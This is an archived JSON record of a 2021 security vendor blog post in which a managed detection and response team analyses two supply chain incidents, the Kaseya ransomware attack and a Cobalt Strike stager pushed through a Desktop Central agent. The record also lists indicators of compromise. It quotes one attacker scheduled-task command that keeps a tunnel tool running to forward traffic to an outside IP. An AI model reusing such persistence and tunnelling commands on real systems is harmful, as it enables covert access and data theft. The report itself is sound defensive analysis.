{
	"id": "8701bcad-892d-4852-a0cc-17ad9addefa8",
	"created_at": "2026-04-06T01:32:17.291688Z",
	"updated_at": "2026-04-10T03:20:33.63546Z",
	"deleted_at": null,
	"sha1_hash": "4d3db8c6e736968d37b3c4a586a9d7a5d0ec082b",
	"title": "Supply Chain Attacks from a Managed Detection and Response Perspective",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 704044,
	"plain_text": "Supply Chain Attacks from a Managed Detection and Response\r\nPerspective\r\nBy Jessie Prevost, Joelson Soares, Janus Agcaoili ( words)\r\nPublished: 2021-08-04 · Archived: 2026-04-06 00:12:33 UTC\r\nMalware\r\nIn this blog entry, we will take a look at two examples of supply chain attacks that our Managed Detection and Response\r\n(MDR) team encountered in the past couple of months.\r\nBy: Jessie Prevost, Joelson Soares, Janus Agcaoili Aug 04, 2021 Read time: 5 min (1418 words)\r\nSave to Folio\r\nIntroduction\r\nModern technology has made managing large IT environments much less daunting compared to the past, when each\r\nendpoint had to be manually configured and maintained. Many organizations now use tools and IT solutions that allow\r\ncentralized management of endpoints, making it possible to update, troubleshoot, and deploy applications from a remote\r\nlocation.\r\nHowever, this convenience comes at a price — just as IT staff can access machines from a single location, the centralized\r\nnature of modern tech infrastructure also means that malicious actors can target the primary hub to gain access to the whole\r\nsystem.  Even more concerning, cybercriminals no longer even have to launch a direct attack against an organization — they\r\ncan bypass security measures by focusing on their target’s supply chainnews article. For example, instead of trying to find\r\nweak points in the system of a large organization that will likely have strong defenses, an attacker can instead target smaller\r\ncompanies that develop software for larger enterprises.\r\nIn this blog entry, we will take a look at two examples of supply chain attacks that our Managed Detection and Response\r\n(MDR) team encountered in the past couple of months.\r\nIncident #1: Attack on the Kaseya platform\r\nOn July 2, during the peak of the Kaseya ransomware incident, we alerted one of our customers, notifying them about\r\n ransomware detections in their system.  \r\nFigure 1. The timeline of the incident\r\nhttps://www.trendmicro.com/en_us/research/21/h/supply-chain-attacks-from-a-managed-detection-and-response-persp.html\r\nPage 1 of 7\n\nOur investigation found suspicious activity when the file AgentMon.exe, which is part of the Kaseya Agent, spawned\r\nanother file, cmd.exe, that is responsible for creating the payload agent.exe, which in turn dropped MsMpEng.exe\r\nBy expanding our root cause analysis (RCA) and checking the argument for cmd.exe, we were able to see a few items before\r\nthe execution of the ransomware. These initial set of indicators of compromise (IoCs) are similar to the ones discussed in\r\nanother blog post.\r\nFigure 2. Vision One console showing the attack’s infection chain\r\nWe found that the malware attempted to disable the anti-malware and anti-ransomware features of Windows Defender via\r\nPowerShell commands. It also created a copy of the Windows command line program Certutil.exe to\r\n“C:\\Windows\\cert.exe”, which is used to decode the payload file agent.crt, with the output given the name agent.exe.\r\n Agent.exe is then used to create the file MsMpEng.exe, a version of Windows Defender that is vulnerable to DLL side-loading.\r\nhttps://www.trendmicro.com/en_us/research/21/h/supply-chain-attacks-from-a-managed-detection-and-response-persp.html\r\nPage 2 of 7\n\nFigure 3. Details of the threat\r\nMachine learning detection capabilities managed to block and detect the ransomware, however, the protection module was\r\nnot activated in all the security agents of Trend Micro Apex One™ — so the organization’s support requested the team to\r\ncheck their product settings. Because the process chain showed that the ransomware came from a Kaseya agent, we \r\nrequested our customer to isolate the Kaseya servers to contain the threat.\r\nA few hours later, Kaseya released a notice to their users to immediately shut down their Virtual System/Server\r\nAdministrator (VSA) server until further notice.\r\nIncident #2: Credential dumping attack on the Active Directory\r\nThe second supply chain incident handled by our MDR team starts with an alert to a customer that notified them of a\r\ncredential dump occurring in their active directory (AD). The Incident View in Trend Micro Vision One™️ aggregated other\r\ndetections into a single view, providing additional information on the scope of the threat. From there, we were able to see a\r\nserver, an endpoint, and a user related to the threat.\r\nhttps://www.trendmicro.com/en_us/research/21/h/supply-chain-attacks-from-a-managed-detection-and-response-persp.html\r\nPage 3 of 7\n\nFigure 4. Vision One’s incident view showing the threat’s details\r\nOur threat hunting team also noted suspicious behavior related to WmiExec. Further investigation of the affected hosts’\r\nOwnership Alignment Tools (OATs) show a related entry for persistence:\r\nC:\\Windows\\System32\\schtasks.exe /CREATE /RU SYSTEM /SC HOURLY /TN \"Windows Defender\" /TR\r\n\"powershell.exe C:\\Windows\\System.exe -L rtcp://0.0.0.0:1035/127.0.0.1:25 -F mwss://52.149.228.45:443\" /ST\r\n12:00\r\nFigure 5. OAT flagging a suspicious creation of a scheduled task\r\nWe found scheduled tasks being utilized as a persistence mechanism for the file System.exe. Further analysis of this file\r\nshows that it is related to GO simple tunnel, which is used to forward network traffic to an IP address depending on the\r\nargument.\r\nChecking the initial alert revealed a file common in the two hosts, which prompted us to check the IOC list to determine the\r\nother affected hosts in the environment.\r\nFigure 6. Discovery commands and access to a malicious domain evident in the process chain\r\nhttps://www.trendmicro.com/en_us/research/21/h/supply-chain-attacks-from-a-managed-detection-and-response-persp.html\r\nPage 4 of 7\n\nExpanding the nodes from the RCA allowed us to gather additional IOCs that showed setup0.exe creating the file\r\nelevateutils.exe. In addition, elevateutils.exe was seen querying the domain vmware[.]center, which is possibly the threat’s\r\ncommand-and-control (C\u0026C) server. We also discovered the earliest instance of setup0.exe in one of the hosts.\r\nThe samples setup0.exe is an installer for elevateutils.exe which seems to be a Cobalt Strike Beacon Malleable C\u0026C stager\r\nbased on our analysis. The installer may have been used to masquerade as a normal file installation. \r\nFigure 7. The presence of EICAR strings is an indicator of it being of elevateutils.exe being a Cobalt Strike\r\nBeacon\r\nThe stager elevateutils.exe: will try to load the DLL chartdir60.dll, which will in turn read the contents of manual.pdf (these\r\nare also dropped by the installer in the same directory as elevateutil.exe). It will then decrypt, load, and execute a shell code\r\nin memory that will access the URL vmware[.]center/mV6c.\r\nIt makes use of VirtualAlloc, VirtualProtect, CreateThread, and a function to decrypt the shellcode to load and execute in\r\nmemory. It also uses indirect API calls after decryption in a separate function, then uses JMP EAX to call the function as\r\nneeded, which is not a routine or behavior that a normal file should have.\r\nSince it’s possible that this is a Cobalt Strike Malleable C\u0026C stager, further behaviors may be dependent on what is\r\ndownloaded from the accessed URL. However, due to being inaccessible at the time of writing this blog post, we were\r\nunable to observe and/or verify other behaviors.\r\nUse of the Progressive RCA of Vision One allowed us to see how elevateutils.exe was created, as well as its behaviors. The\r\nmalicious file was deployed via a Desktop Central agent.\r\nFigure 8. Viewing the behaviors of elevateutils.exe\r\nhttps://www.trendmicro.com/en_us/research/21/h/supply-chain-attacks-from-a-managed-detection-and-response-persp.html\r\nPage 5 of 7\n\nFigure 9. The console showing the attack’s infection chain\r\nBased on these findings, our recommendation to the customer was to check the logon logs of the affected application to\r\nverify any suspicious usage of accounts during the time the threat was deployed.\r\nBy closely monitoring the environment, the threat was stopped after the credential dump. Furthermore, the IOCs (IP\r\naddresses and hashes) were added to the suspicious objects list to block them while waiting for detections. Further\r\nmonitoring was done and no other suspicious behavior were seen.\r\nDefending against supply chain attacks\r\nAs businesses become more interconnected, a successful supply chain attack has the potential to cause a significant amount\r\nof damage to affected organizations.  We can expect to see more of these in the future, as they often lead to the same results\r\nas a direct attack while providing a wider attack surface for malicious actors to exploit.\r\nSupply chain attacks are difficult to track because the targeted organizations often do not have full access to what’s going on\r\nsecurity-wise with their supply chain partners. This can often be exacerbated by security lapses within the company itself.\r\nFor example, products and software may have configurations — such as folder exclusions and suboptimal implementation\r\nof detection modules — that make threats more difficult to notice.\r\nSecurity audits are also a very important step in securing the supply chain.  Even if third party vendors are known to be\r\ntrustworthy, security precautions should still be deployed in case there are compromised accounts or even insider threats.\r\nUsing Vision One to contain the threat\r\nTrend Micro Vision Oneproducts provides offers organizations the ability to detect and respond to threats across multiple\r\nsecurity layers. It provides enterprises options to deal with threats such as the ones discussed in this blog entry:\r\nIt can Isolate endpoints, which are often the source of infection, until they are fully cleaned or the investigation is\r\ndone.\r\nIt can block IOCs related to the threat, this includes hashes, IP addresses, or domains found during analysis.\r\nIt can collect files for further investigation.\r\nIndicators of Compromise (IoCs)\r\nIncident # 1\r\n \r\nhttps://www.trendmicro.com/en_us/research/21/h/supply-chain-attacks-from-a-managed-detection-and-response-persp.html\r\nPage 6 of 7\n\nSHA256 Detection name Details\r\n8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd Ransom.Win32.SODINOKIBI.YABGC mpsvc.\r\nd55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e Trojan.Win32.SODINSTALL.YABGC agent.e\r\nIncident # 2\r\nSHA256 Detection name Details\r\n5e0f28bd2d49b73e96a87f5c20283ebe030f4bb39b3107d4d68015dce862991d HackTool.Win64.Gost.A System.exe\r\n116af9afb2113fd96e35661df5def2728e169129bedd6b0bb76d12aaf88ba1ab  Trojan.Win32.COBALT.AZ Setup0.exe\r\nf52679c0a6196494bde8b61326d753f86fa0f3fea9d601a1fc594cbf9d778b12 Trojan.Win32.COBALT.BA chartdir60.dll\r\nc59ad626d1479ffc4b6b0c02ca797900a09553e1c6ccfb7323fc1cf6e89a9556 Trojan.PDF.COBALT.AA manual.pdf\r\nf4f25ce8cb5825e0a0d76e82c54c25a2e76be3675b8eeb511e2e8a0012717006 Trojan.Win32.COBALT.BA elevateutils.exe\r\nIP addresses and domains\r\n185[.]215[.]113[.]213\r\nvmware[.]center\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/21/h/supply-chain-attacks-from-a-managed-detection-and-response-persp.html\r\nhttps://www.trendmicro.com/en_us/research/21/h/supply-chain-attacks-from-a-managed-detection-and-response-persp.html\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/21/h/supply-chain-attacks-from-a-managed-detection-and-response-persp.html"
	],
	"report_names": [
		"supply-chain-attacks-from-a-managed-detection-and-response-persp.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775439137,
	"ts_updated_at": 1775791233,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4d3db8c6e736968d37b3c4a586a9d7a5d0ec082b.pdf",
		"text": "https://archive.orkl.eu/4d3db8c6e736968d37b3c4a586a9d7a5d0ec082b.txt",
		"img": "https://archive.orkl.eu/4d3db8c6e736968d37b3c4a586a9d7a5d0ec082b.jpg"
	}
}